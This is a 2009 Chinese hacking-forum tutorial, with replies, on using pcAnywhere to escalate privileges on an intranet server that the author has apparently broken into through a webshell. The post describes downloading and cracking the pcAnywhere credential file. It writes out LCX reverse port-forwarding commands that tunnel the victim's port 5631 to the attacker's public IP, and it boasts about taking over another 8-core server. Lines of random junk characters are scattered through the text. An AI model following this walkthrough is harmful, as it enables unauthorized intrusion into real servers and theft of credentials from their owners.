标题:
[原创文章]
pcanywhere之内网提权
[打印本页]
作者:
huar
时间:
2009-7-5 21:35
标题:
pcanywhere之内网提权
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
. ~0 [! O/ a7 `- U
5 n9 b; ^' C4 D2 n& V( T: m
提权方法:pcanywhere+LCX
4 J) Z- b- S5 M* n0 B) @* Y
' t* [9 J+ S1 K: P
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
1 b& y+ H9 @1 l1 N' o$ Z
. m4 k- W2 [! H" V( k2 O* n
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
s4 K/ a" [3 z9 g2 G/ ^: g
5 h& h# Y% H" g# R7 g: a
[attach]1548[/attach]
* p# a! _$ H% [$ Z
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
6 }1 O$ F8 b0 Y: U& L
" W( c; j6 w; X x$ e. w4 t3 ?. W
[attach]1549[/attach]
' t/ f) l8 B( D- f( A$ f
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
7 p l0 X) C2 p- m
5 A. [6 B' } l2 S7 q
[attach]1550[/attach]
( ?1 }: \9 j$ d; f
$ N M& q+ F0 `2 @6 {" e/ x1 |
[attach]1551[/attach]
6 r! [; ?, A* o
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
( ^% f. S1 M, d) l+ `( N! P& h
& a1 Q& g1 C- H2 o/ e
[attach]1552[/attach]
; \0 h- r5 F* Y$ d' Y
LCX的用法再简单说下:
' B5 \$ k; L, Y n9 e2 F+ R7 _
- v5 K2 b+ v) _* G; c
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
6 ~' B; [: m. L `
# I+ y0 W- w7 q8 _
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
) G! F# H6 l' t/ U; _/ g. T) p2 g- {
: }, c2 i/ H' x: c6 N
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
' _( Z: }1 U/ Z% |$ Z9 e# i+ Y
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
5 a- R+ D% c# A) A& J: Y- N1 s
2 C* O. R, U' t, c. M
[attach]1553[/attach]
7 X. j- I+ {* h5 a$ }0 ?
8 L% f5 ]6 Y/ h- f: @) F
[attach]1554[/attach]
; I5 O0 _1 J& z2 ?0 m" J
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
% I9 U+ s3 y' q( S0 w
; O1 f3 g0 c& {4 r4 | S
[attach]1555[/attach]
! r }$ u* G9 g& p* x' Q
3 B) o2 p, _* I5 P' i
[attach]1556[/attach]
9 G# B9 c. b) u4 J$ I7 o1 ~/ d" q3 I8 d
我们本地连接试试,输入我们刚破解的账号密码
1 z8 A* Y( M' m7 V' b: C* L( R
2 I, _ h/ s8 c9 ?8 K$ Y, k
[attach]1557[/attach]
/ U. x D3 ?+ {: i% H
呵呵``连接成功,服务器不错,又一个8核^︵^
$ N1 e& T$ G, c" J5 @
4 D8 o! }$ ^( ]7 s% D# m* x4 e' i. J
[attach]1558[/attach]
6 a v9 i1 @$ k- A0 y" R/ q$ y6 s
8 k9 Q* U$ ^! U9 Z9 r
[attach]1559[/attach]
作者:
柔肠寸断
时间:
2009-7-5 21:37
不错不错。。。你的貌似一直都是内网服务器哈
作者:
huar
时间:
2009-7-5 21:41
哎。。。。运气不佳```老碰见内网的。。。。
作者:
gassiori
时间:
2009-7-6 09:50
八核的哟
作者:
柔肠寸断
时间:
2009-12-15 15:36
顶起。。。。。。。。。
作者:
killadmin
时间:
2010-1-21 20:01
但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2